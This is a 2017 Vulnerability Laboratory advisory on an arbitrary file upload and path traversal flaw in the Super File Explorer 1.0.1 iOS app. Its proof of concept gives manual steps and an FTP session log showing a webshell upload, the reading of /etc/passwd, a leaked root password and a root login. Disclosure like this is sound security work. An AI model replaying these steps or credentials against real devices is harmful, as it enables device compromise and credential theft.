Document Title: =============== Super File Explorer 1.0.1 - Arbitrary File Upload Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2034 Release Date: ============= 2017-02-23 Vulnerability Laboratory ID (VL-ID): ==================================== 2034 Common Vulnerability Scoring System: ==================================== 7 Product & Service Introduction: =============================== This app is a file manager and viewer. For iPhone, iPod touch, and iPad. Copy, paste, rename, and move files. Integrates with AttachmentSaver, Safari Download Manager. Dynamic file sharing folder of iTunes. Manage files in your Dropbox, SugarSync, etc. Send files as email attachments. View and download email attachments. Full screen file viewer. (COpy of the Homepage: https://itunes.apple.com/de/app/super-file-explorer-file-viewer-file-manager/id1101973946 ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a vulnerability in the Super File Explorer v1.0.1 iOS mobile application. Vulnerability Disclosure Timeline: ================================== 2017-02-23: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== LZX Apps Product: Super File Explorer - File Viewer & File Manager (Wifi UI & FTP) 1.0.1 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ An arbitrary file upload web vulnerability has been discovered in the official Super File Explorer v1.0.1 iOS mobile application. The web vulnerability allows remote attackers to upload arbitrary files to compromise for example the file system of a service. The vulnerability is located in the developer path that is accessable and hidden within next to the root path. Remote attackers are able to upload malicious files like webshells to the developer path to access within a next step the `/etc/passwd` file of the ftp service. Thus allows the attacker to gain finally access to the root access credentials of the ftp application to compromise the service or mobile device. The permission rights within the developer path allows an attacker to gain access to the passwd files and other sensitive data. By default there is no password setup for the ftp or web ui account. Attackers can for example access the ftp via console to upload a local file to the developer path. After that the attacker can remotly access the at same time activated ftp web ui service to execute the file. Then the attacker downloads the passwd file and can login with the ftp root credentials to the service. The security risk of the vulnerability is estimated as high with a common vulnerability scoring system count of 7.0. Exploitation of the web vulnerability requires a low privilege ftp application user account and no user interaction. Successful exploitation of the arbitrary file upload web vulnerability results in application or device compromise. Proof of Concept (PoC): ======================= The arbitrary file upload web vulnerability can be exploited by remote attackers without privilege application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Install the vulnerable mobile ios application to your test idevice (iphone) 2. Start the mobile device software 3. Start the ftp and web-server via remote manager button push 4. Open the ftp via console and login as random user with any credentials 5. Move to the developer path in the upper folder 6. Upload of a remote system or the local system path via network a webshell 7. Open ftp web ui url (http://localhost) and move to the developer path 8. Open the webshell and request via GET the "/etc/passwd" file that is accessable 9. Login again to the ftp server using the root:smx7MYTQIi2M 10. Successful root access to compromise the ftp server and mobile via arbitrary file upload vulnerability! FTP WEB UI URL: http://localhost FTP SERVER URL: locahost:2121 --- PoC Exploitation --- C:UsersAdmin>ftp ftp> open 192.168.2.241 2121 Verbindung mit 192.168.2.241 wurde hergestellt. 220 iosFtp server ready. 502 Unknown command 'UTF8' Benutzer (192.168.2.241:(none)): anonymous 331 Password required for anonymous Kennwort: a@xxxxx 230 User anonymous logged in. ftp> cd .. 250 CWD command successful. ftp> dir 200 PORT command successful. 150 Opening ASCII mode data connection for '/bin/ls'. total 3 drwxr-xr-x 1 mobile mobile 68 Feb 17 22:02 Documents drwxr-xr-x 3 mobile mobile 170 Feb 17 22:05 Library drwxr-xr-x 1 mobile mobile 68 Feb 17 22:02 tmp 226 Transfer complete. FTP: 199 Bytes empfangen in 0.01Sekunden 13.27KB/s ftp> cd /../ 250 CWD command successful. ftp> dir 200 PORT command successful. 150 Opening ASCII mode data connection for '/bin/ls'. total 13 ---------- 1 (null) (null) 0 (null) Applications drwxrwxr-x 1 root admin 68 May 29 23:45 Developer ---------- 1 (null) (null) 0 (null) Library ---------- 1 (null) (null) 0 (null) System ---------- 1 (null) (null) 0 (null) bin ---------- 1 (null) (null) 0 (null) cores ---------- 1 (null) (null) 0 (null) dev ---------- 1 (null) (null) 0 (null) etc ---------- 1 (null) (null) 0 (null) private ---------- 1 (null) (null) 0 (null) sbin ---------- 1 (null) (null) 0 (null) tmp ---------- 1 (null) (null) 0 (null) usr ---------- 1 (null) (null) 0 (null) var 226 Transfer complete. ftp> help Befehle können abgekürzt werden. Befehle sind: ! delete literal prompt send ? debug ls put status append dir mdelete pwd trace ascii disconnect mdir quit type bell get mget quote user binary glob mkdir recv verbose bye hash mls remotehelp cd help mput rename close lcd open rmdir ftp> mget Remotedateien server/path/files/webshell FTP: 734 Bytes empfangen in 0.08Sekunden 9.41KB/s ftp> put Lokale Datei webshell Remotedatei /Developers/ - Note: Now, open the web interface and surf on the ftp web ui to the webshell in the developer path which owns user executable rights in the root path. Open the download module and insert the following value "get /etc/passwd". The passwd file is tranfered with the following accounts ... - nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false _ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false _networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false _wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false _installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false _neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false _ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false _securityd:*:64:64:securityd:/var/empty:/usr/bin/false _mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false _sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false _unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false _distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false _astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false _ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false _findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false _datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false _captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false - Now login as root via system administrator account and move to the root path of the application to improve the permission. - ftp> open 192.168.2.241 2121 Verbindung mit 192.168.2.241 wurde hergestellt. 220 iosFtp server ready. 502 Unknown command 'UTF8' Benutzer (192.168.2.241:(none)): root 331 Password required for root Kennwort: smx7MYTQIi2M 230 User root logged in. ftp> cd /../ 250 CWD command successful. ftp> dir 200 PORT command successful. 150 Opening ASCII mode data connection for '/bin/ls'. total 13 drwxrwxr-x 1 root admin 0 (null) Applications drwxrwxr-x 1 root admin 68 May 29 23:45 Developer drwxrwxr-x 1 root admin 0 (null) Library drwxrwxr-x 1 root admin 0 (null) System drwxrwxr-x 1 root admin 0 (null) bin drwxrwxr-x 1 root admin 0 (null) cores drwxrwxr-x 1 root admin 0 (null) dev drwxrwxr-x 1 root admin 0 (null) etc drwxrwxr-x 1 root admin 0 (null) private drwxrwxr-x 1 root admin 0 (null) sbin drwxrwxr-x 1 root admin 0 (null) tmp drwxrwxr-x 1 root admin 0 (null) usr drwxrwxr-x 1 root admin 0 (null) var 226 Transfer complete. FTP: 734 Bytes empfangen in 0.08Sekunden 9.41KB/s ftp> get /etc/passwd 200 PORT command successful. 150 Opening BINARY mode data connection for '/etc/passwd'. 226 Transfer complete. FTP: 1323 Bytes empfangen in 0.00Sekunden 1323000.00KB/s Solution - Fix & Patch: ======================= The vulnerability can be resolved by a change of the root credentials, in combination with the setup of secure access permission rights for the web ui in the developer path. Disallow to use /../ to request the static root path as developer without permission. Security Risk: ============== The security risk of the arbitrary file upload vulnerability in the mobile ftp application is estimated as high. (CVSS 7.0) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission. Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
